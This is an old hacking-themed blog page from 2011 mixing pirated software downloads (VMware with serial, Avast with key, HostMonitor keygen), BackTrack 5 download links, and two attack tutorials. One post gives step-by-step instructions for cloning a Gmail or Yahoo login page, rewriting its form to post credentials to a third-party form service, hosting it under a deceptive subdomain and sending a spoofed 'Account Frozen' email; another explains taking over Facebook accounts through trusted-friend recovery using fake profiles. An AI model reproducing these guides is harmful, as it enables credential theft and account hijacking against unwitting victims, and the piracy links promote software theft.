WELCOME TO THE WORLD OF HACKING

Pages

Tuesday, May 17, 2011

Now Rip Or Clone Any Website [HTTRACK]

"It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system"


Download Now.!
HTTrack Version 3.44-1 [Windows 2000/XP/Vista/Seven]

VMware Workstation v7.1.3-32 + serial


VMware Workstation v7.1.3-32 + serial | 560.35 MB


rom the creator of PC virtualization comes the most reliable, secure way to run multiple operating systems at the same time. Winner of more than 50 industry awards, VMware Workstation transforms the way technical professionals develop, test, demo, and deploy software. VMware Workstation is an integral component of any serious technical professional's toolkit.
Get Maximum Performance for Windows 7
VMware Workstation 7 is optimized for maximum performance when running on 32-bit and 64-bit Windows 7 PCs. Supports Flip 3D and Aero Peek to show live thumbnails of your virtual machines. Run legacy application with 3D graphics, faster performance, and tighter desktop integration better than Windows XP Mode. Get shared folders and drag and drop convenience.
Gain an Indispensable Tool
Automate and streamline tasks to save time and improve productivity. Run applications in Linux, Windows, and more at the same time on the same PC with no rebooting. Evaluate and test new operating systems, applications and patches in an isolated environment. Demonstrate complex software applications on a single laptop in a repeatable, reliable manner. Rich integration with Visual Studio, Eclipse, and the SpringSource Tool Suite make it incredibly easy to debug applications on multiple platforms.
Run Your Most Demanding Applications on the Most Advanced Virtualization Platform
Create virtual machines with up to 8 virtual processors or 8 virtual cores, 2 TB virtual disks and up to 32 GB of memory per virtual machine to run the most demanding applications. Protect your virtual machines from prying eyes with 256-bit AES encryption and smart card authentication.





Download :


http://www.filesonic.com/file/928338071/VMware.Workstation.v7.1.3-32.serial.part1.rar
http://www.filesonic.com/file/928380384/VMware.Workstation.v7.1.3-32.serial.part2.rar

Download BackTrack 5

Download BackTrack 5 directly
Download BackTrack 5 from Mirror - Download BackTrack 5 Torrent

Name:     BT5-KDE-32.torrent
   
Size:           1840
   
Flavor:        KDE
   
Arch:          32 bit
   
Image:       ISO
   
Download BackTrack 5 KDE-32Bit  From Here  :     Torrent
   
MD5:     4150643026d292717f77ebb83948a034

     

=================

Name:     BT5-KDE-64.torrent
   
Size:            1800
   
Flavor:         KDE
   
Arch:           64 bit
   
Image:         ISO
   
Download BackTrack 5 KDE-64Bit From here :     Torrent
   
MD5:     80d65610de90ac7ede49b9f7935dfdd2

     

==================


Name:     BT5-GNOME-32.torrent
   
Size:                  1910
   
Flavor:              GNOME
   
Arch:                 32 bit
   
Image:               ISO
   
Download BackTrack 5 Gnome-32Bit From Here :       Torrent
   
MD5:                 b01a93a916fabb6d1640bd0054428e17


============================================

Name:              BT5-GNOME-64.torrent
   
Size:                1870
   
Flavor:            GNOME
   
Arch:               64 bit
   
Image:             ISO
   
Download BackTrack 5 Gnome-64Bit From Here:     Torrent
   
MD5:                75c4e7a969abc873d9e085656b156345

Saturday, May 7, 2011

How to Hack Gmail or Yahoo or Hotmail or Any Other( New Version)

In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack. But in this new version this problem is eliminated and this is has become more fullproof than the previous version.
First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.
Now follow the following steps :
  1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
  2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
  3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
  4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=”post” action=”https://login.yahoo.com/config/login?” autocomplete=”off” name=”login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
  5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
    put the following code after placing your form id:
<form name=”New_Form” action=”http://www.webformdesigner.net/wfd_f2.php?id=Your Form ID Here” method=”post” enctype=”application/x-www-form-urlencoded” onsubmit=”return New_Form_CF();”>
Now Save the yahoofake.html.
To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.
First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”.
Now select your site name as mail.yahoo.com/support. You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.
Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.
After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked.
If you have your own ideas plz write it as comment to this post. Your participation is always appreciated. Good Luck !

Friday, May 6, 2011

How to Hack Facebook Passwords by adding into friend list

How to Hack Facebook Password: Facebook Password Hacker

Hacking Facebook Passwords
How to Hack Facebook Passwords by adding into friend list

These days many Facebook users have hundreds and possibly thousands of friends. More friends increase the chance that your Facebook account will be hacked – especially if you accept friend requests from people you do not know.

Critical vulnerability found on FACEBOOK

It isn’t entirely unusual that Facebook users receive friend requests from people they do not know. Often, those friend requests are blindly accepted in an effort to grow the friendship base. It seems that especially people with Facebook accounts that are primarily used for marketing purposes are more likely to accept friend requests from people they do not know than the typical Facebook user does.

Such accounts could be hacked easily, and there is no ingenious hacking talent required to do so: You simply need to walk through Facebook’s passwork recovery process with two other Facebook friends of a targeted account.

You can easily gain access to a your friends Facebook account through a collusion approach. You have to use Facebook’s password recovery feature, which is accessible through the “Forgot your password?” link on the Facebook login page.

Once identified the Friend, Facebook suggested to recover the password via the existing email address. However, you can bypass this hurdle by clicking the “No longer have access to these?” link. In that case, Facebook asks for a new email address. In the following step, Facebook presents the security question tied to the account. However, you can also to bypass the question by typing wrong answers three times in a row. After that, Facebook provides a rather surprising way to get your account back – via the support of three friends.
1. First, you select three friends “you trust”. These three friends then receive a code, which is required to change the account password.

2. Select yourself and immediately received a code from Facebook. With those three codes, you can easily change the password for the targeted account.

3. The problem clearly is that three friends you do not really know and cannot trust could potentially gain access to the victim Facebook account – through the standard password recovery feature.

4. To bypass problem mentioned in step 3 SOCIAL ENGINEERING. Create your own 2 more fake profiles and add the victim as a friend on facebook. Now get all the 3 codes and you are done.

NOTE: The targeted account will be locked for 24 hours after this password change and the user’s old email address receives a notification of the password change as well as the names of the three friends who were given the codes. However, if these are friends with fake names, it doesn’t quite matter that you now know their names.

Now if a Facebook user could in fact be in a situation when a Facebook account is not checked within a 24-hour period, particularly since we enjoy to flaunt our activities through Facebook status messages. And if the account is checked frequently, the account depends on Facebook’s response time, which can easily stretch to a number of days.
Bottom line is You don’t expose yourself to people you don’t know.

Tuesday, May 3, 2011

Download Free Avast Antivirus Professional Edition v4.8.1290 With Key


Avast! antivirus professional edition v4.8.1290 incl key | 29.02 Mb

Avast! Professional Edition 4.8 is a collection of award winning, high-end technologies that work in perfect synergy, having one common goal: to protect your system and valuable data against computer viruses, spyware and rootkits. It represents a best-in-class antivirus solution for any Windows-based workstation.

Avast 4.8 Professional Edition is a complete ICSA and Checkmark certified antivirus, Checkmark certified anti-spyware and anti-rootkit software package for corporate and advanced home use. avast Professional Edition includes an on demand scanner with two user interfaces, a skinnable simple interface: just select what you want to scan and in which way and press the play button, an enhanced user interface: Outlook like UI allows users to set any feature of Avast, prepare and run tasks, store and check task results, on access scanner: special providers to protect: most available e-mail clients, instant messaging: ICQ or Miranda, network traffic: lightweight firewall, P2P protection for Kazaa, BitTorrent, Web shield: all HTTP traffic, script blocker. avast Professional Edition is available in 32 languages. Small, true incremental, updates are downloaded.

Home Page - http://www.avast.com/eng/avast_4_professional.html


.............

Advanced HostMonitor 7.18+keygen download




Advanced HostMonitor is a network monitor program. You can create a list of jobs and tests in advance on a 'set and forget' basis. Among the many checks it can do, it can monitor any TCP service, ping a host, retrieve an URL, check the available disk space, and more. It checks network servers at regular intervals and takes pre-defined actions if a device does not respond. It can provide a visual and sound warning, send an E-mail message to a mailbox, pager or mobile phone, execute another program, etc. All this allowing you to respond to a problem before your users start to complain.


Features :

HostMonitor is a highly scalable network monitoring software
suitable for small and enterprise-level networks
Probably you will say "There are dozens of programs like this"? That is right! But please check what HostMonitor offers and compare its power and flexibility to surprisingly low price:
using 60 test methods our software can check almost any parameter of your servers;
highly flexible action profiles allow you to start actions in predefined order depending on the test results;
HostMonitor creates various log files using different detail levels and file formats (Text, HTML, DBF and ODBC);
built-in Report Manager allows you to create and customize reports to your liking in a variety of ways;
using Remote Monitoring Agents for Windows, FreeBSD, Linux, NetBSD, OpenBSD and Solaris you may easily monitor remote networks;
Web Service, Telnet Service and Remote Control Console simplifies remote management;
and this is not all...



60 test methods!

HostMonitor can check any TCP service, ping a host, check a route, monitor Web, FTP, Mail, DNS servers. It can check the available disk space, monitor size of a file or folder, check integrity of your files and web site; it tests your SQL servers, monitors network traffic and much, much more. See complete test list.

But what is of no less importance is how you can manage monitoring tasks ("test items" in our terminology). Test items can be organized into different groups (folders), each folder has its own settings such as color palette, list of reports, different statistic information, etc.

Tests can be performed on regular intervals (e.g. every 5 min) or on schedule (e.g. every Friday between 6pm and 9pm); tests can be performed directly by HostMonitor or they can be performed by Remote Monitoring Agents installed on remote network. Some tests may depend on another, e.g. you may easily configure HostMonitor to check 10 web servers when your primary router is up, and check another (backup) server when your primary router is down.

30 alert methods

HostMonitor is a network administration software, it provides different ways to respond on failed services. Audio and visual notifications alert people near the machine. E-mail and pager notifications inform a wider range of remote operators. HostMonitor can take actions that are designed to recover from a failure automatically without human intervention (e.g. "restart service", "reboot computer" or "dial-up to the network" actions). See complete actions list.

Highly flexible Action Profiles allow you to start actions in predefined order depending on the test results:
- E.g. you may start some action only when both primary and backup mail servers do not respond.
- Or an action profile can be set up to page both the IT manager and the network administrator during regular office hours, and to page the administrator alone the rest of the time, while doing nothing else but writing to the log on weekends.
- Another example: when some critical service fails HostMonitor may reboot the server. If that does not help, HostMonitor will send e-mail to the on-call technician. If, however, the server remains silent during the next three probes, the network administrator is to be paged until the server is brought back up.



Install HostMonitor and you will see how easy it is to implement all of the above with even more sophisticated behavior patterns.
And yes, various macro variables allow you to use the same action profile for hundreds or thousands of monitoring tasks (test items). E.g. If you monitor 10 different services on each of 100 servers, you may use single action to restart any failed service on any of these systems.

Powerful Report Manager and Log Analyzer

HostMonitor can generate test result log files and reports. HostMonitor creates various log files using different detail levels and file formats (Text, HTML, DBF and ODBC) and can be configured to suit your needs.

The highly flexible built-in Report Manager allows you to create and customize reports to your liking in a variety of ways. For example, a report designed for the IT manager might have an entirely different look and feel as compared to the one intended for use by the network administrator. Also note that separate groups of tests may contain its own list of reports, and each of the reports may be set up with a launching schedule specific to that group.

Also Advanced Host Monitor package includes a Log Analyzer which can illustrate separate information for each tested host. The Log Analyzer can collect statistical information and show graphs of all response times for specific time periods for all or individual servers. Using the statistical information, an administrator can analyze request times for specific servers over a period of time.

Remote Monitoring Agents for Windows, FreeBSD, Linux, NetBSD, OpenBSD and Solaris

HostMonitor can check remote hosts directly or using Remote Monitoring Agents (RMA) installed in another network. RMA is small application that accepts requests from HostMonitor, performs test and provides information about test result back to HostMonitor.
RMA increases security of the network, decreases network traffic, simplifies network administration, and allows to monitor systems that are impossible to monitor directly from HostMonitor (e.g. using RMA HostMonitor can check a number of running processes on Linux system).

Web service, Telnet service, Remote Control Console

Web Service works like an HTTP server and provides web interface for HostMonitor. Telnet Service works like Telnet server and allows you to control HostMonitor remotely using any telnet client. These applications allow you to check brief or detailed status of any test, start or stop monitoring process, enable or disable alerts, change global macro variables, etc. Also you will be able to disable and enable tests, reset statistics, force tests to execution and even change some parameters of the tests.
RCC allows you to work with HostMonitor which is running on a remote system just like you work with HostMonitor when it is started on your local system. Several operators may start RCC on different systems and work with the same instance of HostMonitor at the same time.

Homepage: http://www.ks-soft.com
http://www.megaupload.com/?d=I64TBSGP